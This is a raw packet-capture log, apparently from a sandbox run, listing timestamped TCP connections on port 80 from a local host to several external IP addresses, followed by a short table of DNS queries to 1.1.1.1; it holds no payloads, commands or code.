                                                          Jul 26, 2024 18:46:52.800540924 CEST5514880192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:53.761634111 CEST5514880192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:53.770459890 CEST805514884.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:54.800702095 CEST5514980192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:54.806032896 CEST805514984.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:54.806778908 CEST5514980192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:54.828394890 CEST5514980192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:54.833399057 CEST805514984.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:54.833617926 CEST805514984.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:55.331340075 CEST805514984.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:55.331428051 CEST5514980192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:56.339808941 CEST5514980192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:56.345120907 CEST805514984.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.380570889 CEST5515080192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:57.385555029 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.385631084 CEST5515080192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:57.405827999 CEST5515080192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:57.410840988 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.913244963 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.913407087 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.913934946 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.913949966 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.914889097 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.914902925 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.914927959 CEST5515080192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:57.915950060 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.916507959 CEST5515080192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:57.918955088 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.919553995 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.919569016 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.919688940 CEST5515080192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:57.919688940 CEST5515080192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:57.931759119 CEST5515080192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:57.937174082 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:47:02.990731001 CEST5515180192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:02.995698929 CEST8055151188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:02.995923042 CEST5515180192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:03.023267031 CEST5515180192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:03.028551102 CEST8055151188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:04.528564930 CEST5515180192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:04.534332037 CEST8055151188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:04.540548086 CEST5515180192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:05.564923048 CEST5515280192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:05.570415974 CEST8055152188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:05.570596933 CEST5515280192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:05.591670036 CEST5515280192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:05.597023010 CEST8055152188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:06.912610054 CEST8055152188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:06.912760019 CEST8055152188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:06.912795067 CEST8055152188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:06.912805080 CEST5515280192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:06.914153099 CEST8055152188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:06.914184093 CEST8055152188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:06.914194107 CEST5515280192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:06.914788008 CEST8055152188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:06.914822102 CEST8055152188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:06.914830923 CEST5515280192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:06.915483952 CEST8055152188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:06.915538073 CEST5515280192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:07.105624914 CEST5515280192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:08.143713951 CEST5515380192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:08.148977995 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:08.156569004 CEST5515380192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:08.180576086 CEST5515380192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:08.185894966 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:08.186465979 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:09.166889906 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:09.167099953 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:09.167110920 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:09.167222977 CEST5515380192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:09.168064117 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:09.168075085 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:09.168112993 CEST5515380192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:09.169152021 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:09.169162035 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:09.169171095 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:09.169205904 CEST5515380192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:09.169205904 CEST5515380192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:09.169941902 CEST8055153188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:09.169996023 CEST5515380192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:09.684549093 CEST5515380192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:10.719513893 CEST5515480192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:10.724647999 CEST8055154188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:10.728739023 CEST5515480192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:10.756584883 CEST5515480192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:10.761522055 CEST8055154188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:12.013639927 CEST8055154188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:12.013736963 CEST8055154188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:12.016782045 CEST5515480192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:12.028553963 CEST5515480192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:12.033586025 CEST8055154188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:17.109901905 CEST5515580192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:17.118227005 CEST8055155154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:17.118298054 CEST5515580192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:17.141370058 CEST5515580192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:17.149327993 CEST8055155154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:18.091609955 CEST8055155154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:18.123343945 CEST8055155154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:18.124603987 CEST5515580192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:18.128036022 CEST8055155154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:18.128537893 CEST5515580192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:18.652079105 CEST5515580192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:19.696734905 CEST5515680192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:19.704792023 CEST8055156154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:19.704864025 CEST5515680192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:19.727794886 CEST5515680192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:19.744875908 CEST8055156154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:20.695777893 CEST8055156154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:20.696382046 CEST8055156154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:20.696767092 CEST5515680192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:21.246345997 CEST5515680192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:22.281121969 CEST5515780192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:22.286169052 CEST8055157154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:22.286591053 CEST5515780192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:22.308600903 CEST5515780192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:22.314038038 CEST8055157154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:22.314116001 CEST8055157154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:23.454579115 CEST8055157154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:23.454612017 CEST8055157154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:23.454663038 CEST5515780192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:23.833961010 CEST5515780192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:24.862626076 CEST5515880192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:24.873303890 CEST8055158154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:24.873579979 CEST5515880192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:24.889914036 CEST5515880192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:24.896066904 CEST8055158154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:25.866499901 CEST8055158154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:25.866578102 CEST8055158154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:25.866655111 CEST5515880192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:25.874594927 CEST5515880192.168.2.5154.218.3.243
                                                          Jul 26, 2024 18:47:25.879487991 CEST8055158154.218.3.243192.168.2.5
                                                          Jul 26, 2024 18:47:30.948569059 CEST5515980192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:30.956262112 CEST8055159148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:30.956331015 CEST5515980192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:30.980041027 CEST5515980192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:31.008711100 CEST8055159148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:31.941521883 CEST8055159148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:31.941637039 CEST8055159148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:31.947607040 CEST5515980192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:32.496642113 CEST5515980192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:33.533226013 CEST5516080192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:33.542100906 CEST8055160148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:33.542161942 CEST5516080192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:33.567893982 CEST5516080192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:33.575824976 CEST8055160148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:34.529320002 CEST8055160148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:34.529465914 CEST8055160148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:34.532500982 CEST5516080192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:35.076366901 CEST5516080192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:36.107513905 CEST5516180192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:36.115241051 CEST8055161148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:36.119373083 CEST5516180192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:36.140595913 CEST5516180192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:36.145523071 CEST8055161148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:36.146802902 CEST8055161148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:37.379759073 CEST8055161148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:37.379942894 CEST8055161148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:37.380006075 CEST5516180192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:37.652192116 CEST5516180192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:38.685007095 CEST5516280192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:38.690542936 CEST8055162148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:38.692708015 CEST5516280192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:38.712620974 CEST5516280192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:38.717675924 CEST8055162148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:39.672660112 CEST8055162148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:39.672688961 CEST8055162148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:39.672804117 CEST5516280192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:39.680701971 CEST5516280192.168.2.5148.66.138.133
                                                          Jul 26, 2024 18:47:39.686975002 CEST8055162148.66.138.133192.168.2.5
                                                          Jul 26, 2024 18:47:44.740606070 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:44.762044907 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:44.768502951 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:44.784499884 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:44.789555073 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.465374947 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.465393066 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.465401888 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.465445995 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:45.467727900 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.467737913 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.467763901 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:45.471170902 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.471180916 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.471225977 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:45.474961042 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.474972963 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.474999905 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:45.478755951 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.478769064 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.478796005 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:45.485028028 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.485040903 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.485080004 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:45.525516987 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:45.554532051 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.555249929 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.555294991 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:45.555708885 CEST8055163162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:45.555752039 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:46.294905901 CEST5516380192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:47.336883068 CEST5516480192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:47.344954967 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.345031023 CEST5516480192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:47.378555059 CEST5516480192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:47.384574890 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.980654001 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.981376886 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.981389046 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.982873917 CEST5516480192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:47.984262943 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.984273911 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.987487078 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.987498045 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.987514019 CEST5516480192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:47.988540888 CEST5516480192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:47.990753889 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.990765095 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.993859053 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.993885994 CEST5516480192.168.2.5162.254.38.56
                                                          Jul 26, 2024 18:47:47.994389057 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.995549917 CEST8055164162.254.38.56192.168.2.5
                                                          Jul 26, 2024 18:47:47.995573997 CEST5516480192.168.2.5162.254.38.56
Jul 26, 2024 18:47:48.000628948 CEST  55164  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:48.074939966 CEST  80  55164  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:48.075557947 CEST  80  55164  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:48.076062918 CEST  80  55164  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:48.076204062 CEST  55164  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:48.888653040 CEST  55164  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:49.922677994 CEST  55165  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:49.930632114 CEST  80  55165  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:49.930711031 CEST  55165  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:49.961024046 CEST  55165  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:49.985635996 CEST  80  55165  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:50.015510082 CEST  80  55165  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:50.654274940 CEST  80  55165  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:50.655075073 CEST  80  55165  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:50.655103922 CEST  80  55165  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:50.657850027 CEST  80  55165  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:50.657866955 CEST  80  55165  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:50.660516977 CEST  55165  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:50.661066055 CEST  80  55165  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:50.661083937 CEST  80  55165  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:50.664283037 CEST  80  55165  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:50.664299011 CEST  80  55165  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:50.664313078 CEST  80  55165  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:50.664319038 CEST  55165  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:50.664386034 CEST  55165  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:50.664386034 CEST  55165  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:50.667285919 CEST  80  55165  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:50.668437004 CEST  80  55165  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:50.668627977 CEST  55165  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:50.669495106 CEST  80  55165  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:50.716630936 CEST  55165  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:50.744970083 CEST  80  55165  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:50.745417118 CEST  80  55165  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:50.745877981 CEST  80  55165  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:50.751108885 CEST  55165  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:51.464869976 CEST  55165  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:52.500526905 CEST  55166  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:52.505420923 CEST  80  55166  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:52.505516052 CEST  55166  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:52.552531004 CEST  55166  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:52.557490110 CEST  80  55166  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:53.160244942 CEST  80  55166  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:53.160916090 CEST  80  55166  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:53.160928965 CEST  80  55166  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:53.160947084 CEST  55166  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:53.164319038 CEST  80  55166  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:53.164331913 CEST  80  55166  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:53.164351940 CEST  55166  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:53.166889906 CEST  80  55166  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:53.166903973 CEST  80  55166  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:53.166927099 CEST  55166  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:53.169164896 CEST  80  55166  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:53.169177055 CEST  80  55166  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:53.169195890 CEST  55166  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:53.171744108 CEST  80  55166  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:53.171756029 CEST  80  55166  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:53.171771049 CEST  55166  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:53.174278975 CEST  80  55166  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:53.174292088 CEST  80  55166  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:53.174309969 CEST  55166  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:53.228650093 CEST  55166  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:53.250940084 CEST  80  55166  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:53.251430988 CEST  80  55166  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:53.251502037 CEST  55166  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:53.251656055 CEST  80  55166  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:53.251683950 CEST  55166  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:53.261449099 CEST  55166  80  192.168.2.5  162.254.38.56
Jul 26, 2024 18:47:53.266177893 CEST  80  55166  162.254.38.56  192.168.2.5
Jul 26, 2024 18:47:58.320648909 CEST  55167  80  192.168.2.5  142.171.29.133
Jul 26, 2024 18:47:58.328293085 CEST  80  55167  142.171.29.133  192.168.2.5
Jul 26, 2024 18:47:58.328389883 CEST  55167  80  192.168.2.5  142.171.29.133
Jul 26, 2024 18:47:58.348274946 CEST  55167  80  192.168.2.5  142.171.29.133
Jul 26, 2024 18:47:58.353389978 CEST  80  55167  142.171.29.133  192.168.2.5
Jul 26, 2024 18:47:58.931396008 CEST  80  55167  142.171.29.133  192.168.2.5
Jul 26, 2024 18:47:58.931451082 CEST  80  55167  142.171.29.133  192.168.2.5
Jul 26, 2024 18:47:58.931739092 CEST  55167  80  192.168.2.5  142.171.29.133
Jul 26, 2024 18:47:59.855313063 CEST  55167  80  192.168.2.5  142.171.29.133
Jul 26, 2024 18:48:01.404455900 CEST  55168  80  192.168.2.5  142.171.29.133
Jul 26, 2024 18:48:01.410311937 CEST  80  55168  142.171.29.133  192.168.2.5
Jul 26, 2024 18:48:01.411946058 CEST  55168  80  192.168.2.5  142.171.29.133
Jul 26, 2024 18:48:01.433706045 CEST  55168  80  192.168.2.5  142.171.29.133
Jul 26, 2024 18:48:01.438515902 CEST  80  55168  142.171.29.133  192.168.2.5
Jul 26, 2024 18:48:02.001708031 CEST  80  55168  142.171.29.133  192.168.2.5
Jul 26, 2024 18:48:02.001805067 CEST  80  55168  142.171.29.133  192.168.2.5
Jul 26, 2024 18:48:02.001863956 CEST  55168  80  192.168.2.5  142.171.29.133
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Jul 26, 2024 18:45:19.017045975 CEST  53  53713  1.1.1.1  192.168.2.5
Jul 26, 2024 18:45:20.596808910 CEST  53  52453  1.1.1.1  192.168.2.5
Jul 26, 2024 18:45:50.269546986 CEST  51176  53  192.168.2.5  1.1.1.1
Jul 26, 2024 18:45:50.651097059 CEST  53  51176  1.1.1.1  192.168.2.5
Jul 26, 2024 18:46:11.850596905 CEST  56750  53  192.168.2.5  1.1.1.1
Jul 26, 2024 18:46:11.922832966 CEST  53  56750  1.1.1.1  192.168.2.5
Jul 26, 2024 18:46:25.201191902 CEST  63132  53  192.168.2.5  1.1.1.1
Jul 26, 2024 18:46:26.213613033 CEST  63132  53  192.168.2.5  1.1.1.1
Jul 26, 2024 18:46:26.826675892 CEST  53  63132  1.1.1.1  192.168.2.5
Jul 26, 2024 18:46:26.826783895 CEST  53  63132  1.1.1.1  192.168.2.5
Jul 26, 2024 18:46:29.879143953 CEST  63239  53  192.168.2.5  1.1.1.1
Jul 26, 2024 18:46:30.873960972 CEST  63239  53  192.168.2.5  1.1.1.1
Jul 26, 2024 18:46:31.060903072 CEST  53  63239  1.1.1.1  192.168.2.5
Jul 26, 2024 18:46:31.060947895 CEST  53  63239  1.1.1.1  192.168.2.5
Jul 26, 2024 18:46:36.095433950 CEST  60291  53  192.168.2.5  1.1.1.1
Jul 26, 2024 18:46:36.111792088 CEST  53  60291  1.1.1.1  192.168.2.5
Jul 26, 2024 18:46:49.577018976 CEST  63366  53  192.168.2.5  1.1.1.1
Jul 26, 2024 18:46:49.629254103 CEST  53  63366  1.1.1.1  192.168.2.5
Jul 26, 2024 18:47:02.961139917 CEST  51874  53  192.168.2.5  1.1.1.1
Jul 26, 2024 18:47:02.979382038 CEST  53  51874  1.1.1.1  192.168.2.5
Jul 26, 2024 18:47:17.052340031 CEST  63742  53  192.168.2.5  1.1.1.1
Jul 26, 2024 18:47:17.100346088 CEST  53  63742  1.1.1.1  192.168.2.5
Jul 26, 2024 18:47:30.906625032 CEST  63600  53  192.168.2.5  1.1.1.1
Jul 26, 2024 18:47:30.939110041 CEST  53  63600  1.1.1.1  192.168.2.5
Jul 26, 2024 18:47:44.703351974 CEST  56484  53  192.168.2.5  1.1.1.1
Jul 26, 2024 18:47:44.730062962 CEST  53  56484  1.1.1.1  192.168.2.5
